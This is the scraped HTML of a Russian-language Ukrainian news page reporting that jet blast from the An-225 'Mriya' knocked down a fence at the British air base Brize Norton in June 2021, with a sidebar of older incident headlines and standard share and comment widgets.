			<div class='cls'></div><span class='news_date'>11.04.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4349771">
				    <span class="postDate">22:05</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/747-avtor-video-na-polnom-hodu-vletel-v-massovuyu-avariyu">Автор видео на полном ходу "влетел" в массовую аварию</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>04.04.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4348062">
				    <span class="postDate">23:45</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/812-vo-lvove-gost-iz-zakarpatya-ugrozhal-pistoletom-mestnomu-voditelyu">Во Львове гость из Закарпатья угрожал пистолетом местному водителю</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>03.04.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4347818">
				    <span class="postDate">23:08</span>
				       					    	<!-- here is BOLD --> <a class="postTitle orang" href="https://enovosty.com/proishestviya-video/full/577-v-krymu-broneavtomobil-rossijskih-okkupantov-protaranil-trollejbus-videofoto">В Крыму бронеавтомобиль российских оккупантов протаранил троллейбус (ВИДЕО+ФОТО)</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>30.03.2014 г.</span><br />			<div class="post_news">
			    <span id="post-4346952">
				    <span class="postDate">19:49</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/341-opublikovano-foto-veroyatnyh-ubijc-nebesnoj-sotni">Опубликовано фото вероятных убийц Небесной сотни</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>28.09.2013 г.</span><br />			<div class="post_news">
			    <span id="post-4392135">
				    <span class="postDate">20:13</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/638-mir-na-grani-yadernoj-vojny-karibskij-krizis">Мир на грани ядерной войны: Карибский кризис</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>26.09.2013 г.</span><br />			<div class="post_news">
			    <span id="post-4391672">
				    <span class="postDate">23:02</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/546-samaya-masshtabnaya-tragediya-v-istorii-kosmicheskih-ekspedicij-ssha-apollon-1">Самая масштабная трагедия в истории космических экспедиций США: "Аполлон-1"</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>24.09.2013 г.</span><br />			<div class="post_news">
			    <span id="post-4391051">
				    <span class="postDate">22:28</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/737-katastrofa-vblizi-zebryugge">Катастрофа вблизи Зебрюгге</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
						<div class="cls"></div>
				<hr />
				<div class="cls"></div>
			<div class='cls'></div><span class='news_date'>21.09.2013 г.</span><br />			<div class="post_news">
			    <span id="post-4390286">
				    <span class="postDate">22:41</span>
				    				    	<a class="postTitle" href="https://enovosty.com/proishestviya-video/full/181-golodomor-1932-1933-godov">Голодомор 1932-1933 годов</a><br />
				    			    </span>
				<div class="postFields"></div>
			</div>
			<div class="cls"></div>
	<a class="readMore" href="https://enovosty.com/news/proishestviya-video">Все новости &raquo;</a>
</div>	
						<div class="links_bal">
					</div>
				
	 	<!--  News Join -->

			<!-- <div id="lastafisha" class="slide ssingle">
					</div> -->
		
	

    
	
		
		
    <!--  end News Join -->



	</div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category">
<style type="text/css" media="screen">
	@import url( https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);
</style>
<style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px;} </style>


<div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" >
        
	<div itemscope itemtype="https://schema.org/NewsArticle" class="post" style="margin:0; padding:0; " id="post-4853050">
		<meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video"/>
		<article style="font-size:12pt;">
			<!-- <div class="widget simple" id="readMoreInPost">-->
			<!--  <h2>Читайте также</h2> -->
			<!--    
			</div>-->
						<h1 itemprop="headline" id="postTitle">Украинская &#171;Мрия&#187; снесла ограждение на британской авиабазе (ВИДЕО)</h1>
						<div class="breadcrumb">
				<a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_incidents">Происшествия</a> <span>&raquo;</span> Украинская "Мрия" снесла ограждение на британской авиабазе (ВИДЕО)			</div>
			<time datetime="2021-06-26T15:10:52+03:00">
			<span id="date">
				Происшествия,  15:10:52 			</span>
			</time>
			<div class="border">&nbsp;</div>
			<table class="social">
				<tr>
					<td>
						<div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_22 addtoany_list" data-a2a-url="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video" data-a2a-title="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО)"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_telegram" href="https://www.addtoany.com/add_to/telegram?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Telegram" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Copy Link" rel="nofollow noopener" target="_blank"></a></div></div>					</td>
				</tr>			
			</table>
			<div class="printmail">
				 <a href="https://enovosty.com/print?printajax=4853050" style="padding-right:3px;">
					<img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать">
				</a>
				 <a href="#" id="mailto">
					<img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту">
				</a>
				<div class="mailwin" style="display:none;">
					<span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span>
					<input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button>
				</div>
				<p class="al_loadingImage" style="top:4%;">&nbsp;</p>
			</div>
			<div class="border">&nbsp;</div>
												
			 <div class="single_main_image">
					 
						<div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73">
						<img width="460" height="257" src="https://enovosty.com/wp-content/uploads/2021/06/mrija-460x257.png" class="attachment-news-image size-news-image wp-post-image" alt="" loading="lazy" srcset="https://enovosty.com/wp-content/uploads/2021/06/mrija-460x257.png 460w, https://enovosty.com/wp-content/uploads/2021/06/mrija-300x168.png 300w, https://enovosty.com/wp-content/uploads/2021/06/mrija-640x357.png 640w, https://enovosty.com/wp-content/uploads/2021/06/mrija-112x63.png 112w, https://enovosty.com/wp-content/uploads/2021/06/mrija-768x429.png 768w, https://enovosty.com/wp-content/uploads/2021/06/mrija.png 1200w" sizes="(max-width: 460px) 100vw, 460px" />						</div>
						
					</div> <p><b>Крупнейший транспортный самолет Украины Ан-225 "Мрия" снес ограждение британской военно-воздушной базы Брайз-Нортон под действием потока воздуха от его движков.</b></p><p>Журналисты и фотографы наблюдали за взлетом из-за ограждения, при этом никто не был травмирован. YouTube-канал Aviation Highlights обнародовал видео происшествия 24 июня, информируют <a href="https://enovosty.com/" rel="noopener" target="_blank">Экономические новости</a>.</p>
<p><a class="tag" href="https://enovosty.com/tag/samolet" target="_blank">Самолет</a>-гигант, который впервые поднялся в воздух в прошлом году после 18-месячного капитального ремонта, совершил рейс в Кабул (Афганистан), затем в Карачи (Пакистан), после чего прибыл в Великобританию. Он доставил три геликоптера Королевских ВВС на базу Брайз Нортон.</p>
<p>Чтобы заснять момент взлета &#171;Мрии&#187;, за оградой базы собрались фотографы.  Но ограждения не смогли выдержать напор воздушного потока от двигателей украинского самолета, и он рухнул на землю.</p>
<p>На видеозаписи можно увидеть, как несколько полицейских машин подъезжают к остаткам ограждения после взлета самолета. В этот момент один из телевизионщиков выкрикнул в адрес полицейских: &#171;Это же русские!&#187;.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news/news_technology/full/2506-v-britanii-ukrainskij-samolet-mriya-sluchajno-sdul-ograzhdenie-aerodroma" >В Британии украинский самолет "Мрия" случайно "сдул" ограждение аэродрома (ВИДЕО)</a></p>
<p>Автор этого видео также добавил, что на базе наверняка не слишком рады рухнувшему ограждению.</p>
<p><iframe loading="lazy" width="480" height="280" src="https://www.youtube.com/embed/FxNCGcuHYyk" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<div class="tptn_counter" style="color:white;" id="tptn_counter_4853050"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4853050&amp;_wpnonce=94b574175e"></script></div>			<br />
									
			<span itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
			<div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
				<img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/>


			  <meta itemprop="width" content="512">
			  <meta itemprop="height" content="512">
			</div>
			<meta itemprop="name" content="Экономические новости" />
			<meta itemprop="telephone" content="+380958836229">
			<meta itemprop="address" content="Киев">
			
			</span>
			
			<span itemprop="author" itemscope itemtype="https://schema.org/Person">
				
							<meta itemprop="name" content="Экономические новости" />
			
			</span>
			
			<meta itemprop="datePublished" content="2021-06-26T15:10:52+03:00"/>
			<meta itemprop="dateModified" content="2021-06-26T15:10:52+03:00"/>
			
						
			<meta itemprop="genre" content="Происшествия"/>
			<meta itemprop="description" content="Крупнейший транспортный самолет Украины Ан-225 "Мрия" снес ограждение британской военно-воздушной базы Брайз-Нортон под действием потока воздуха от его движков."/>
			
			
		
						
			
			<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow">

			<span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/06/mrija-460x257.png">

			<span itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/06/mrija-460x257.png">

			<meta itemprop="width" content="460">

			<meta itemprop="height" content="257"> </span></span>

			</div>

						
			
		</article>
	</div>

    <div class="postFooter" style="padding:0;">
					<a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank">
				<img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg">
			</a>
						<div id="postAuthor" style="overflow:auto;">
			<span id="authorName" style="margin-right: 25px;float: left;">
			<span id="label">Автор: </span>Елена Каденко			</span>
		</div>	
				<div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">
		ТЕГИ: <a href="https://enovosty.com/tag/an-225" rel="tag">Ан-225</a>, <a href="https://enovosty.com/tag/britanskaya-aviabaza" rel="tag">британская авиабаза</a>, <a href="https://enovosty.com/tag/mriya" rel="tag">Мрия</a>, <a href="https://enovosty.com/tag/samolet" rel="tag">самолет</a>		</div>
					<div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 713</div>
				<div class="voteBox" > </div>
		<br />
		<!-- <p style="font-size:14px; font-style:italic; clear:both;">Присоединяйтесь к странице "Экономические Новости" на <a href="https://www.facebook.com/eizvestia/" rel="nofollow" target="_blank"> <strong style="font-size:14px; color:#369;">Facebook</strong></a>, следите за обновлениями!</p> -->
		<p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p>
		<div class="border">&nbsp;</div>
		<table class="social">
			<tr>
				<td>
					<div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_22 addtoany_list" data-a2a-url="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video" data-a2a-title="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО)"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_telegram" href="https://www.addtoany.com/add_to/telegram?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Telegram" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video&amp;linkname=%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F%20%C2%AB%D0%9C%D1%80%D0%B8%D1%8F%C2%BB%20%D1%81%D0%BD%D0%B5%D1%81%D0%BB%D0%B0%20%D0%BE%D0%B3%D1%80%D0%B0%D0%B6%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%B1%D1%80%D0%B8%D1%82%D0%B0%D0%BD%D1%81%D0%BA%D0%BE%D0%B9%20%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B0%D0%B7%D0%B5%20%28%D0%92%D0%98%D0%94%D0%95%D0%9E%29" title="Copy Link" rel="nofollow noopener" target="_blank"></a></div></div>				</td>
			</tr>			
		</table>
		<div class="printmail" style="float: right; width: 54px; margin-top: 8px;">
			 <a href="https://enovosty.com/print?printajax=4853050" style="padding-right:3px;">
				<img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать">
			</a>
			 <a href="#" id="mailto">
				<img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту">
			</a>
			<div class="mailwin" style="display:none;">
				<span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span>
				<input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button>
			</div>
			<p class="al_loadingImage" style="top:4%;">&nbsp;</p>
		</div>
		<div class="border">&nbsp;</div>		
	
		
    <div class="wpdiscuz_top_clearing"></div>
    <div id='comments' class='comments-area'><div id='respond' style='width: 0;height: 0;clear: both;margin: 0;padding: 0;'></div>    <div id="wpdcom" class="wpdiscuz_unauth wpd-default wpd-layout-1 wpd-comments-open">
                    <div class="wc_social_plugin_wrapper">
                            </div>
            <div class="wpd-form-wrap">
                <div class="wpd-form-head">
                                            <div class="wpd-sbs-toggle">
                            <i class="far fa-envelope"></i> <span class="wpd-sbs-title">Подписаться</span> <i class="fas fa-caret-down"></i>
                        </div>
                                            <div class="wpd-auth">
                        <div class='wpd-social-login'><span class='wpd-connect-with'>Соединить с</span><span class='wpdsn wpdsn-fb wpdiscuz-login-button' wpd-tooltip='Facebook'><i class='fab fa-facebook'></i></span><span class='wpdsn wpdsn-tw wpdiscuz-login-button' wpd-tooltip='Twitter'><i class='fab fa-twitter'></i></span><span class='wpdsn wpdsn-gg wpdiscuz-login-button' wpd-tooltip='Google'><i class='fab fa-google'></i></span><div class='wpdiscuz-social-login-spinner'><i class='fas fa-spinner fa-pulse'></i></div><div class='wpd-clear'></div></div>                        <div class="wpd-login">
                            <div class='wpd-sep'></div><a href="https://enovosty.com/wp-login.php?redirect_to=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews_incidents%2Ffull%2F2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video"><i class='fas fa-sign-in-alt'></i> авторизуйтесь</a>                        </div>
                    </div>
                </div>
                            <div class="wpd-social-login-agreement" style="display: none;">
                <div class="wpd-agreement-title">Я разрешаю создать мне учетную запись</div>
                <div class="wpd-agreement">Когда вы первый раз заходите с помощью соцсетей, мы получаем публичную информацию из вашей учетной записи, предоставляемой провайдером услуги соцсети в рамках ваших настроек конфиденциальности. Мы также автоматически получаем ваш e-mail адрес для создания вашей учетной записи на нашем веб сайте. Когда она будет создана, вы будете авторизованы под этой учетной записью.</div>
                <div class="wpd-agreement-buttons">
                    <div class="wpd-agreement-buttons-right"><span class="wpd-agreement-button wpd-agreement-button-disagree">Не согласен</span><span class="wpd-agreement-button wpd-agreement-button-agree">Согласен</span></div>
                    <div class="wpd-clear"></div>
                </div>
            </div>
                                                <div class="wpdiscuz-subscribe-bar wpdiscuz-hidden">
                                                    <form action="https://enovosty.com/wp-admin/admin-ajax.php?action=wpdAddSubscription" method="post" id="wpdiscuz-subscribe-form">
                                <div class="wpdiscuz-subscribe-form-intro">Уведомить о </div>
                                <div class="wpdiscuz-subscribe-form-option" style="width:40%;">
                                    <select class="wpdiscuz_select" name="wpdiscuzSubscriptionType" >
                                                                                    <option value="post">новых последующих комментариях</option>
                                                                                                                                <option value="all_comment" >новых ответах на мои комментарии</option>
                                                                                </select>
                                </div>
                                                                    <div class="wpdiscuz-item wpdiscuz-subscribe-form-email">
                                        <input  class="email" type="email" name="wpdiscuzSubscriptionEmail" required="required" value="" placeholder="Email"/>
                                    </div>
                                                                    <div class="wpdiscuz-subscribe-form-button">
                                    <input id="wpdiscuz_subscription_button" class="wpd-prim-button" type="submit" value="&rsaquo;" name="wpdiscuz_subscription_button" />
                                </div> 
                                <input type="hidden" id="wpdiscuz_subscribe_form_nonce" name="wpdiscuz_subscribe_form_nonce" value="0db885569e" /><input type="hidden" name="_wp_http_referer" value="/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video" />                            </form>
                                                </div>
                            <div class="wpd-form wpd-form-wrapper wpd-main-form-wrapper" id='wpd-main-form-wrapper-0_0'>
                                </div>
                <div id="wpdiscuz_hidden_secondary_form" style="display: none;">
                    <div class="wpd-form wpd-form-wrapper wpd-secondary-form-wrapper" id='wpd-secondary-form-wrapper-wpdiscuzuniqueid' style='display: none;'>
                            <div class="wpd-secondary-forms-social-content"><div class='wpd-social-login'><span class='wpd-connect-with'>Соединить с</span><span class='wpdsn wpdsn-fb wpdiscuz-login-button' wpd-tooltip='Facebook'><i class='fab fa-facebook'></i></span><span class='wpdsn wpdsn-tw wpdiscuz-login-button' wpd-tooltip='Twitter'><i class='fab fa-twitter'></i></span><span class='wpdsn wpdsn-gg wpdiscuz-login-button' wpd-tooltip='Google'><i class='fab fa-google'></i></span><div class='wpdiscuz-social-login-spinner'><i class='fas fa-spinner fa-pulse'></i></div><div class='wpd-clear'></div></div>            <div class="wpd-social-login-agreement" style="display: none;">
                <div class="wpd-agreement-title">Я разрешаю создать мне учетную запись</div>
                <div class="wpd-agreement">Когда вы первый раз заходите с помощью соцсетей, мы получаем публичную информацию из вашей учетной записи, предоставляемой провайдером услуги соцсети в рамках ваших настроек конфиденциальности. Мы также автоматически получаем ваш e-mail адрес для создания вашей учетной записи на нашем веб сайте. Когда она будет создана, вы будете авторизованы под этой учетной записью.</div>
                <div class="wpd-agreement-buttons">
                    <div class="wpd-agreement-buttons-right"><span class="wpd-agreement-button wpd-agreement-button-disagree">Не согласен</span><span class="wpd-agreement-button wpd-agreement-button-agree">Согласен</span></div>
                    <div class="wpd-clear"></div>
                </div>
            </div>
            </div><div class="clearfix"></div>
                                </div>
                </div>
                            <div class="wpd-login-to-comment">Пожалуйста, войдите, чтобы прокомментировать</div>
                                </div>
                        <div id="wpd-threads" class="wpd-thread-wrapper">
                <div class="wpd-thread-head">
                    <div class="wpd-thread-info " data-comments-count="0">
                        <span class='wpdtc' title='0'>0</span> Комментарий                    </div>
                                        <div class="wpd-space"></div>
                    <div class="wpd-thread-filter">
                                                    <div class="wpd-filter wpdf-reacted wpd_not_clicked" wpd-tooltip="Популярнейший комментарий "><i class="fas fa-bolt"></i></div>
                                                        <div class="wpd-filter wpdf-hottest wpd_not_clicked" wpd-tooltip="Цепочка актуального комментария"><i class="fas fa-fire"></i></div>
                                                </div>
                </div>
                <div class="wpd-comment-info-bar">
                    <div class="wpd-current-view"><i class="fas fa-quote-left"></i> Межтекстовые Отзывы </div>
                    <div class="wpd-filter-view-all">Посмотреть все комментарии</div>
                </div>
                                <div class="wpd-thread-list">
                                        <div class="wpdiscuz-comment-pagination">
                                            </div>
                </div>
            </div>
                </div>
        </div>
    <div id="wpdiscuz-loading-bar" class="wpdiscuz-loading-bar-unauth"></div>
    <div id="wpdiscuz-comment-message" class="wpdiscuz-comment-message-unauth"></div>
    		
	</div>  <!--postfooter-->
    	
